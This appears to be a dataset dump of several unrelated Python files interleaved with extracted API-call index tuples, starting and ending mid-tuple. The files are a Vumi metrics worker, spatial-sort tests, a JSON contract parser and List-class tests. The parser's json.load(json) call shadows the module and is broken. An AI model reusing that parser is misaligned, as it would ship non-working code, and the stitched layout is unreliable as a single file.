Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((5982, 6046), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (5991, 6046), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6060, 6154), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', '"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (6069, 6154), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6243, 6316), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), "('price', int, False, 'The price of the goods in the currency.')\n", (6252, 6316), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6330, 6423), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the currency.')\n", (6339, 6423), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6512, 6598), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (6521, 6598), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7385, 7430), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (7394, 7430), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7444, 7489), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""3"""', 'int', '(True)', '"""A good on offer."""'], {}), "('3', int, True, 'A good on offer.')\n", (7453, 7489), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7503, 7567), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (7512, 7567), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7581, 7675), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', '"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (7590, 7675), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7764, 7837), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), "('price', int, False, 'The price of the goods in the currency.')\n", (7773, 7837), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((7851, 7944), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the currency.')\n", (7860, 7944), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((8033, 8119), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (8042, 8119), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((9356, 9401), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (9365, 9401), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((9415, 9479), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (9424, 9479), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((9493, 9587), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', '"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (9502, 9587), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((9676, 9749), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), "('price', int, False, 'The price of the goods in the currency.')\n", (9685, 9749), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((9763, 9856), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the currency.')\n", (9772, 9856), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((9945, 10031), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (9954, 10031), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((8294, 8317), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['""">="""', '(1)'], {}), "('>=', 1)\n", (8308, 8317), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((8348, 8371), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['""">="""', '(1)'], {}), "('>=', 1)\n", (8362, 8371), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((8410, 8441), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['"""=="""', 'ledger_id'], {}), "('==', ledger_id)\n", (8424, 8441), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((8482, 8515), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['"""=="""', 'currency_id'], {}), "('==', currency_id)\n", (8496, 8515), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((10206, 10229), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['""">="""', '(1)'], {}), "('>=', 1)\n", (10220, 10229), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((10268, 10299), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['"""=="""', 'ledger_id'], {}), "('==', ledger_id)\n", (10282, 10299), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((10340, 10373), 'aea.helpers.search.models.ConstraintType', 'ConstraintType', (['"""=="""', 'currency_id'], {}), "('==', currency_id)\n", (10354, 10373), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n')] |
# -*- test-case-name: go.vumitools.tests.test_metrics_worker -*-
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.internet.task import LoopingCall
from vumi import log
from vumi.worker import BaseWorker
from vumi.config import ConfigInt, ConfigError
from vumi.persist.model import Manager
from go.vumitools.api import VumiApi, VumiApiCommand, ApiCommandPublisher
from go.vumitools.app_worker import GoWorkerConfigMixin, GoWorkerMixin
class GoMetricsWorkerConfig(BaseWorker.CONFIG_CLASS, GoWorkerConfigMixin):
"""At the start of each `metrics_interval` the :class:`GoMetricsWorker`
collects a list of all active conversations and distributes them
into `metrics_interval / metrics_granularity` buckets.
Immediately afterwards and then after each `metrics_granulatiry`
interval, the metrics worker sends a `collect_metrics` command to each
of the conversations in the current bucket until all buckets have been
processed.
Once all buckets have been processed, active conversations are
collected again and the cycle repeats.
"""
metrics_interval = ConfigInt(
"How often (in seconds) the worker should send `collect_metrics` "
"commands for each conversation. Must be an integer multiple of "
"`metrics_granularity`.",
default=300,
static=True)
metrics_granularity = ConfigInt(
"How often (in seconds) the worker should process a bucket of "
"conversations.",
default=5,
static=True)
def post_validate(self):
if (self.metrics_interval % self.metrics_granularity != 0):
raise ConfigError("Metrics interval must be an integer multiple"
" of metrics granularity.")
class GoMetricsWorker(BaseWorker, GoWorkerMixin):
"""A metrics collection worker for Go applications.
This worker operates by finding all conversations that require metrics
collection and sending commands to the relevant application workers to
trigger the actual metrics.
"""
CONFIG_CLASS = GoMetricsWorkerConfig
worker_name = 'go_metrics'
@inlineCallbacks
def setup_worker(self):
yield self._go_setup_worker()
config = self.get_static_config()
self.vumi_api = yield VumiApi.from_config_async({
'riak_manager': config.riak_manager,
'redis_manager': config.redis_manager,
})
self.redis = self.vumi_api.redis
self.command_publisher = yield self.start_publisher(
ApiCommandPublisher)
self._current_bucket = 0
self._num_buckets = (
config.metrics_interval // config.metrics_granularity)
self._buckets = dict((i, []) for i in range(self._num_buckets))
self._conversation_workers = {}
self._looper = LoopingCall(self.metrics_loop_func)
self._looper.start(config.metrics_granularity)
@inlineCallbacks
def teardown_worker(self):
if self._looper.running:
self._looper.stop()
yield self.redis.close_manager()
yield self._go_teardown_worker()
def bucket_for_conversation(self, conv_key):
return hash(conv_key) % self._num_buckets
@inlineCallbacks
def populate_conversation_buckets(self):
account_keys = yield self.find_account_keys()
num_conversations = 0
# We deliberarely serialise this. We don't want to hit the datastore
# too hard for metrics.
for account_key in account_keys:
conv_keys = yield self.find_conversations_for_account(account_key)
num_conversations += len(conv_keys)
for conv_key in conv_keys:
bucket = self.bucket_for_conversation(conv_key)
if conv_key not in self._conversation_workers:
# TODO: Clear out archived conversations
user_api = self.vumi_api.get_user_api(account_key)
conv = yield user_api.get_wrapped_conversation(conv_key)
self._conversation_workers[conv_key] = conv.worker_name
worker_name = self._conversation_workers[conv_key]
self._buckets[bucket].append(
(account_key, conv_key, worker_name))
log.info(
"Scheduled metrics commands for %d conversations in %d accounts."
% (num_conversations, len(account_keys)))
@inlineCallbacks
def process_bucket(self, bucket):
convs, self._buckets[bucket] = self._buckets[bucket], []
for account_key, conversation_key, worker_name in convs:
yield self.send_metrics_command(
account_key, conversation_key, worker_name)
def increment_bucket(self):
self._current_bucket += 1
self._current_bucket %= self._num_buckets
@inlineCallbacks
def metrics_loop_func(self):
if self._current_bucket == 0:
yield self.populate_conversation_buckets()
yield self.process_bucket(self._current_bucket)
self.increment_bucket()
def setup_connectors(self):
pass
@Manager.calls_manager
def find_account_keys(self):
keys = yield self.vumi_api.account_store.users.all_keys()
disabled_keys = yield self.redis.smembers('disabled_metrics_accounts')
returnValue(set(keys) - set(disabled_keys))
def find_conversations_for_account(self, account_key):
user_api = self.vumi_api.get_user_api(account_key)
return user_api.conversation_store.list_running_conversations()
def send_metrics_command(self, account_key, conversation_key, worker_name):
cmd = VumiApiCommand.command(
worker_name,
'collect_metrics',
conversation_key=conversation_key,
user_account_key=account_key)
return self.command_publisher.publish_message(cmd)
| [
"twisted.internet.task.LoopingCall",
"vumi.config.ConfigError",
"vumi.config.ConfigInt",
"go.vumitools.api.VumiApi.from_config_async",
"go.vumitools.api.VumiApiCommand.command"
] | [((1151, 1349), 'vumi.config.ConfigInt', 'ConfigInt', (['"""How often (in seconds) the worker should send `collect_metrics` commands for each conversation. Must be an integer multiple of `metrics_granularity`."""'], {'default': '(300)', 'static': '(True)'}), "(\n 'How often (in seconds) the worker should send `collect_metrics` commands for each conversation. Must be an integer multiple of `metrics_granularity`.'\n , default=300, static=True)\n", (1160, 1349), False, 'from vumi.config import ConfigInt, ConfigError\n'), ((1414, 1536), 'vumi.config.ConfigInt', 'ConfigInt', (['"""How often (in seconds) the worker should process a bucket of conversations."""'], {'default': '(5)', 'static': '(True)'}), "(\n 'How often (in seconds) the worker should process a bucket of conversations.'\n , default=5, static=True)\n", (1423, 1536), False, 'from vumi.config import ConfigInt, ConfigError\n'), ((2872, 2907), 'twisted.internet.task.LoopingCall', 'LoopingCall', (['self.metrics_loop_func'], {}), '(self.metrics_loop_func)\n', (2883, 2907), False, 'from twisted.internet.task import LoopingCall\n'), ((5702, 5826), 'go.vumitools.api.VumiApiCommand.command', 'VumiApiCommand.command', (['worker_name', '"""collect_metrics"""'], {'conversation_key': 'conversation_key', 'user_account_key': 'account_key'}), "(worker_name, 'collect_metrics', conversation_key=\n conversation_key, user_account_key=account_key)\n", (5724, 5826), False, 'from go.vumitools.api import VumiApi, VumiApiCommand, ApiCommandPublisher\n'), ((1679, 1767), 'vumi.config.ConfigError', 'ConfigError', (['"""Metrics interval must be an integer multiple of metrics granularity."""'], {}), "(\n 'Metrics interval must be an integer multiple of metrics granularity.')\n", (1690, 1767), False, 'from vumi.config import ConfigInt, ConfigError\n'), ((2330, 2437), 'go.vumitools.api.VumiApi.from_config_async', 'VumiApi.from_config_async', (["{'riak_manager': config.riak_manager, 'redis_manager': config.redis_manager}"], {}), "({'riak_manager': config.riak_manager,\n 'redis_manager': config.redis_manager})\n", (2355, 2437), False, 'from go.vumitools.api import VumiApi, VumiApiCommand, ApiCommandPublisher\n')] |
import sys
from os.path import exists
from unittest.mock import patch
import numpy as np # type: ignore
import pytest
from despace.spatial_sort import SortND
sys.path.append("..")
coords_1d = np.array([1.0, 0.1, 1.5, -0.3, 0.0])
sorted_coords_1d = np.array([-0.3, 0.0, 0.1, 1.0, 1.5])
coords_2d = np.array(
[[1.0, 0.1, 1.5, -0.3, 0.0], [1.5, 0.2, 1.3, -0.1, 0.7]]
).transpose()
sorted_coords_2d = np.array(
[[-0.3, -0.1], [0.0, 0.7], [0.1, 0.2], [1.0, 1.5], [1.5, 1.3]]
)
coords_3d = np.array(
[[1.2, 0.0, 1.7, -0.4, 0.1], [1.4, 0.9, 1.0, -0.6, 0.3], [2.0, 0.0, 1.4, -0.2, 0.2]]
).transpose()
sorted_coords_3d = np.array(
[
[-0.4, -0.6, -0.2],
[0.0, 0.9, 0.0],
[0.1, 0.3, 0.2],
[1.7, 1.0, 1.4],
[1.2, 1.4, 2.0],
]
)
grid_16 = np.array([[i, j] for i in range(4) for j in range(4)])
morton_grid_16 = np.array(
[
[0, 0],
[0, 1],
[1, 0],
[1, 1],
[0, 2],
[0, 3],
[1, 2],
[1, 3],
[2, 0],
[2, 1],
[3, 0],
[3, 1],
[2, 2],
[2, 3],
[3, 2],
[3, 3],
]
)
hilbert_grid_16 = np.array(
[
[0, 0],
[1, 0],
[1, 1],
[0, 1],
[0, 2],
[0, 3],
[1, 3],
[1, 2],
[2, 2],
[2, 3],
[3, 3],
[3, 2],
[3, 1],
[2, 1],
[2, 0],
[3, 0],
]
)
def test_sort():
# Init and call the sort method
t = SortND(coords_1d)
assert np.array_equal(t.sort(), sorted_coords_1d)
t = SortND(coords_2d)
assert np.array_equal(t.sort(), sorted_coords_2d)
t = SortND(coords_3d)
assert np.array_equal(t.sort(), sorted_coords_3d)
with pytest.raises(ValueError):
SortND(np.random.rand(2, 2, 2))
# init and directly call
s = SortND()
assert np.array_equal(s(coords_1d), sorted_coords_1d)
assert np.array_equal(s(coords_2d), sorted_coords_2d)
assert np.array_equal(s(coords_3d), sorted_coords_3d)
with pytest.raises(ValueError):
s(np.random.rand(2, 2, 2))
# test Morton
s = SortND(sort_type="Morton")
assert np.array_equal(s(grid_16), morton_grid_16)
# test Hilbert
s = SortND(sort_type="Hilbert")
assert np.array_equal(s(grid_16), hilbert_grid_16)
with pytest.raises(NotImplementedError):
s(np.random.rand(5, 3))
@patch("matplotlib.pyplot.show")
def test_plot(mock_show):
s = SortND()
# show plots
s(coords_1d)
assert s.plot(save_plot=False)
assert s.plot(save_plot=False, show_plot=True)
s(coords_2d)
assert s.plot(save_plot=False)
assert s.plot(save_plot=False, show_plot=True)
s(coords_3d)
assert s.plot(save_plot=False)
assert s.plot(save_plot=False, show_plot=True)
# save plots
s(coords_1d)
s.plot(save_plot=True)
assert exists("1D_5.png")
s.plot(save_plot=True, file_name="test_1d.png")
assert exists("test_1d.png")
s(coords_2d)
s.plot(save_plot=True)
assert exists("2D_5.png")
s.plot(save_plot=True, file_name="test_2d.png")
assert exists("test_2d.png")
s(coords_3d)
s.plot(save_plot=True)
assert exists("3D_5.png")
s.plot(save_plot=True, file_name="test_3d.png")
assert exists("test_3d.png")
| [
"os.path.exists",
"numpy.random.rand",
"numpy.array",
"pytest.raises",
"unittest.mock.patch",
"sys.path.append",
"despace.spatial_sort.SortND"
] | [((162, 183), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (177, 183), False, 'import sys\n'), ((197, 233), 'numpy.array', 'np.array', (['[1.0, 0.1, 1.5, -0.3, 0.0]'], {}), '([1.0, 0.1, 1.5, -0.3, 0.0])\n', (205, 233), True, 'import numpy as np\n'), ((253, 289), 'numpy.array', 'np.array', (['[-0.3, 0.0, 0.1, 1.0, 1.5]'], {}), '([-0.3, 0.0, 0.1, 1.0, 1.5])\n', (261, 289), True, 'import numpy as np\n'), ((407, 479), 'numpy.array', 'np.array', (['[[-0.3, -0.1], [0.0, 0.7], [0.1, 0.2], [1.0, 1.5], [1.5, 1.3]]'], {}), '([[-0.3, -0.1], [0.0, 0.7], [0.1, 0.2], [1.0, 1.5], [1.5, 1.3]])\n', (415, 479), True, 'import numpy as np\n'), ((631, 734), 'numpy.array', 'np.array', (['[[-0.4, -0.6, -0.2], [0.0, 0.9, 0.0], [0.1, 0.3, 0.2], [1.7, 1.0, 1.4], [\n 1.2, 1.4, 2.0]]'], {}), '([[-0.4, -0.6, -0.2], [0.0, 0.9, 0.0], [0.1, 0.3, 0.2], [1.7, 1.0, \n 1.4], [1.2, 1.4, 2.0]])\n', (639, 734), True, 'import numpy as np\n'), ((866, 1009), 'numpy.array', 'np.array', (['[[0, 0], [0, 1], [1, 0], [1, 1], [0, 2], [0, 3], [1, 2], [1, 3], [2, 0], [2,\n 1], [3, 0], [3, 1], [2, 2], [2, 3], [3, 2], [3, 3]]'], {}), '([[0, 0], [0, 1], [1, 0], [1, 1], [0, 2], [0, 3], [1, 2], [1, 3], [\n 2, 0], [2, 1], [3, 0], [3, 1], [2, 2], [2, 3], [3, 2], [3, 3]])\n', (874, 1009), True, 'import numpy as np\n'), ((1164, 1307), 'numpy.array', 'np.array', (['[[0, 0], [1, 0], [1, 1], [0, 1], [0, 2], [0, 3], [1, 3], [1, 2], [2, 2], [2,\n 3], [3, 3], [3, 2], [3, 1], [2, 1], [2, 0], [3, 0]]'], {}), '([[0, 0], [1, 0], [1, 1], [0, 1], [0, 2], [0, 3], [1, 3], [1, 2], [\n 2, 2], [2, 3], [3, 3], [3, 2], [3, 1], [2, 1], [2, 0], [3, 0]])\n', (1172, 1307), True, 'import numpy as np\n'), ((2406, 2437), 'unittest.mock.patch', 'patch', (['"""matplotlib.pyplot.show"""'], {}), "('matplotlib.pyplot.show')\n", (2411, 2437), False, 'from unittest.mock import patch\n'), ((1507, 1524), 'despace.spatial_sort.SortND', 'SortND', (['coords_1d'], {}), '(coords_1d)\n', (1513, 1524), False, 'from despace.spatial_sort import SortND\n'), ((1587, 1604), 'despace.spatial_sort.SortND', 'SortND', (['coords_2d'], {}), '(coords_2d)\n', (1593, 1604), False, 'from despace.spatial_sort import SortND\n'), ((1667, 1684), 'despace.spatial_sort.SortND', 'SortND', (['coords_3d'], {}), '(coords_3d)\n', (1673, 1684), False, 'from despace.spatial_sort import SortND\n'), ((1853, 1861), 'despace.spatial_sort.SortND', 'SortND', ([], {}), '()\n', (1859, 1861), False, 'from despace.spatial_sort import SortND\n'), ((2134, 2160), 'despace.spatial_sort.SortND', 'SortND', ([], {'sort_type': '"""Morton"""'}), "(sort_type='Morton')\n", (2140, 2160), False, 'from despace.spatial_sort import SortND\n'), ((2243, 2270), 'despace.spatial_sort.SortND', 'SortND', ([], {'sort_type': '"""Hilbert"""'}), "(sort_type='Hilbert')\n", (2249, 2270), False, 'from despace.spatial_sort import SortND\n'), ((2472, 2480), 'despace.spatial_sort.SortND', 'SortND', ([], {}), '()\n', (2478, 2480), False, 'from despace.spatial_sort import SortND\n'), ((2881, 2899), 'os.path.exists', 'exists', (['"""1D_5.png"""'], {}), "('1D_5.png')\n", (2887, 2899), False, 'from os.path import exists\n'), ((2963, 2984), 'os.path.exists', 'exists', (['"""test_1d.png"""'], {}), "('test_1d.png')\n", (2969, 2984), False, 'from os.path import exists\n'), ((3040, 3058), 'os.path.exists', 'exists', (['"""2D_5.png"""'], {}), "('2D_5.png')\n", (3046, 3058), False, 'from os.path import exists\n'), ((3122, 3143), 'os.path.exists', 'exists', (['"""test_2d.png"""'], {}), "('test_2d.png')\n", (3128, 3143), False, 'from os.path import exists\n'), ((3199, 3217), 'os.path.exists', 'exists', (['"""3D_5.png"""'], {}), "('3D_5.png')\n", (3205, 3217), False, 'from os.path import exists\n'), ((3281, 3302), 'os.path.exists', 'exists', (['"""test_3d.png"""'], {}), "('test_3d.png')\n", (3287, 3302), False, 'from os.path import exists\n'), ((303, 369), 'numpy.array', 'np.array', (['[[1.0, 0.1, 1.5, -0.3, 0.0], [1.5, 0.2, 1.3, -0.1, 0.7]]'], {}), '([[1.0, 0.1, 1.5, -0.3, 0.0], [1.5, 0.2, 1.3, -0.1, 0.7]])\n', (311, 369), True, 'import numpy as np\n'), ((499, 597), 'numpy.array', 'np.array', (['[[1.2, 0.0, 1.7, -0.4, 0.1], [1.4, 0.9, 1.0, -0.6, 0.3], [2.0, 0.0, 1.4, -\n 0.2, 0.2]]'], {}), '([[1.2, 0.0, 1.7, -0.4, 0.1], [1.4, 0.9, 1.0, -0.6, 0.3], [2.0, 0.0,\n 1.4, -0.2, 0.2]])\n', (507, 597), True, 'import numpy as np\n'), ((1748, 1773), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (1761, 1773), False, 'import pytest\n'), ((2045, 2070), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2058, 2070), False, 'import pytest\n'), ((2335, 2369), 'pytest.raises', 'pytest.raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (2348, 2369), False, 'import pytest\n'), ((1790, 1813), 'numpy.random.rand', 'np.random.rand', (['(2)', '(2)', '(2)'], {}), '(2, 2, 2)\n', (1804, 1813), True, 'import numpy as np\n'), ((2082, 2105), 'numpy.random.rand', 'np.random.rand', (['(2)', '(2)', '(2)'], {}), '(2, 2, 2)\n', (2096, 2105), True, 'import numpy as np\n'), ((2381, 2401), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)'], {}), '(5, 3)\n', (2395, 2401), True, 'import numpy as np\n')] |
import json
def is_valid(smc_type): # checks if smc_type is valid
if smc_type == 'vmt':
return True
elif smc_type == 'flt':
return True
elif smc_type == 'nfl':
return True
else:
return False
def parse_vmt(contract):
try:
contract.get('value')
contract.get('seller')
contract.get('product')
except:
return False
return True
def parse_flt(contract):
try:
contract.get('value')
contract.get('seller')
contract.get('product')
contract.get('land-id')
contract.get('land-id').get('1')
except:
return False
return True
def parse_nfl(contract):
try:
contract.get('value')
contract.get('seller')
contract.get('product')
contract.get('land-id')
contract.get('land-id').get('1')
except:
return False
return True
def parse_type(smc_type, contract):
if smc_type=='vmt':
return parse_vmt(contract)
elif smc_type=='flt':
return parse_flt(contract)
elif smc_type == 'nfl':
return parse_nfl(contract)
def parse_contract(json):
try:
contract = json.load(json) # Tries to load the contract
smc_type = contract.get('type')
except:
return False
if(is_valid(smc_type) is False): # validate if the contract type is valid
return False
if parse_type(smc_type=smc_type, contract=contract) is True:
return contract
else:
return False
| [
"json.load"
] | [((1197, 1212), 'json.load', 'json.load', (['json'], {}), '(json)\n', (1206, 1212), False, 'import json\n')] |
from hamcrest import *
from nose.tools import eq_
from mc import List, Some, Nothing,add
def test_list_map():
eq_(List([1, 2, 3]).map(lambda x: x * 2), [2, 4, 6])
def test_list_flat_map():
eq_(List([1, 3]).flat_map(lambda x: (x * 2, x * 4)), [2, 4, 6, 12])
def test_list_filter():
eq_(List([1, 2, 3]).filter(lambda x: x < 2), [1])
def test_list_fold():
eq_(List([1, 2, 3]).fold(lambda x, y: x * y, 1), 6)
def test_list_group_by():
eq_(
List([1, 2, 3, 4, 5, 6]).group_by(lambda x: x % 2),
{1: [1, 3, 5], 0: [2, 4, 6]}
)
def test_list_mk_string():
eq_(List([5, 6, 7]).mk_string("_", "<", ">"), "<5_6_7>")
def test_list_to_dict():
eq_(List([(5, 6), (7, 8)]).to_dict(), {5: 6, 7: 8})
def test_list_to_set():
eq_(List([5, 6, 7]).to_set().to_list(), List([5, 6, 7]))
def test_list_multiproc_map():
def process_el(x):
return x * 2
eq_(List([1, 2, 3]).multiproc_map(process_el), [2, 4, 6])
def test_list_foreach():
dictionary = {}
def add_to_dict(value):
dictionary[value] = value
List([9, 8, 7]).foreach(add_to_dict)
actual = set(dictionary.keys())
eq_(actual, {9, 8, 7})
def test_list_should_flat_map_iterables():
assert_that(
List([1, 2]).flat_map(lambda x: {
x, x * 2, x * 3}), contains_inanyorder(1, 2, 3, 2, 4, 6)
)
def test_list_reduce_should_return_nothing_for_empty_list():
assert_that(
List([]).reduce(lambda x, y: x), equal_to(Nothing())
)
def test_list_reduce_should_aggregate_values():
assert_that(
List([1, 2, 3]).reduce(lambda x, y: x + y), equal_to(Some(6))
)
def test_list_addition():
assert_that(
List([1, 2]) + List(["3", 4]), equal_to(List([1, 2, "3", 4]))
)
def test_zip_with_idx():
assert_that(
List(["A","C","D"]).zip_with_idx(), equal_to(List([(0,"A"),(1,"C"),(2,"D")]))
)
def test_list_pick_one():
assert_that(
calling(List(['1','2']).pick_one), raises(AssertionError)
)
assert_that(
calling(List([]).pick_one), raises(AssertionError)
)
assert_that(
List([1]).pick_one(), equal_to(1)
)
def test_accumulate():
assert_that(
List([1,2,3]).accumulate(add, 2), equal_to(8)
)
def test_accumulate():
assert_that(
List([1,2,3]).accumulate(add, 2), equal_to(8)
)
def test_count():
assert_that(
List([1,2,3]).count(), equal_to(3)
)
def test_zip():
assert_that(
List([1,2]).zip([3,4]) , equal_to([(1,3),(2,4)])
)
def test_zip_shift():
assert_that(
List([1,2]).zip_shift() , equal_to([(1,2)])
)
assert_that(
List([1,2]).zip_shift(2) , equal_to([])
)
assert_that(
List([1,2,3]).zip_shift(2) , equal_to([(1,3)])
)
assert_that(
List([1,2,3]).zip_shift(1) , equal_to([(1,2),(2,3)])
)
| [
"mc.Nothing",
"mc.List",
"nose.tools.eq_",
"mc.Some"
] | [((1160, 1182), 'nose.tools.eq_', 'eq_', (['actual', '{9, 8, 7}'], {}), '(actual, {9, 8, 7})\n', (1163, 1182), False, 'from nose.tools import eq_\n'), ((812, 827), 'mc.List', 'List', (['[5, 6, 7]'], {}), '([5, 6, 7])\n', (816, 827), False, 'from mc import List, Some, Nothing, add\n'), ((1083, 1098), 'mc.List', 'List', (['[9, 8, 7]'], {}), '([9, 8, 7])\n', (1087, 1098), False, 'from mc import List, Some, Nothing, add\n'), ((1492, 1501), 'mc.Nothing', 'Nothing', ([], {}), '()\n', (1499, 1501), False, 'from mc import List, Some, Nothing, add\n'), ((1637, 1644), 'mc.Some', 'Some', (['(6)'], {}), '(6)\n', (1641, 1644), False, 'from mc import List, Some, Nothing, add\n'), ((1705, 1717), 'mc.List', 'List', (['[1, 2]'], {}), '([1, 2])\n', (1709, 1717), False, 'from mc import List, Some, Nothing, add\n'), ((1720, 1734), 'mc.List', 'List', (["['3', 4]"], {}), "(['3', 4])\n", (1724, 1734), False, 'from mc import List, Some, Nothing, add\n'), ((1745, 1765), 'mc.List', 'List', (["[1, 2, '3', 4]"], {}), "([1, 2, '3', 4])\n", (1749, 1765), False, 'from mc import List, Some, Nothing, add\n'), ((1870, 1906), 'mc.List', 'List', (["[(0, 'A'), (1, 'C'), (2, 'D')]"], {}), "([(0, 'A'), (1, 'C'), (2, 'D')])\n", (1874, 1906), False, 'from mc import List, Some, Nothing, add\n'), ((120, 135), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (124, 135), False, 'from mc import List, Some, Nothing, add\n'), ((205, 217), 'mc.List', 'List', (['[1, 3]'], {}), '([1, 3])\n', (209, 217), False, 'from mc import List, Some, Nothing, add\n'), ((303, 318), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (307, 318), False, 'from mc import List, Some, Nothing, add\n'), ((381, 396), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (385, 396), False, 'from mc import List, Some, Nothing, add\n'), ((474, 498), 'mc.List', 'List', (['[1, 2, 3, 4, 5, 6]'], {}), '([1, 2, 3, 4, 5, 6])\n', (478, 498), False, 'from mc import List, Some, Nothing, add\n'), ((606, 621), 'mc.List', 'List', (['[5, 6, 7]'], {}), '([5, 6, 7])\n', (610, 621), False, 'from mc import List, Some, Nothing, add\n'), ((694, 716), 'mc.List', 'List', (['[(5, 6), (7, 8)]'], {}), '([(5, 6), (7, 8)])\n', (698, 716), False, 'from mc import List, Some, Nothing, add\n'), ((914, 929), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (918, 929), False, 'from mc import List, Some, Nothing, add\n'), ((1253, 1265), 'mc.List', 'List', (['[1, 2]'], {}), '([1, 2])\n', (1257, 1265), False, 'from mc import List, Some, Nothing, add\n'), ((1450, 1458), 'mc.List', 'List', (['[]'], {}), '([])\n', (1454, 1458), False, 'from mc import List, Some, Nothing, add\n'), ((1584, 1599), 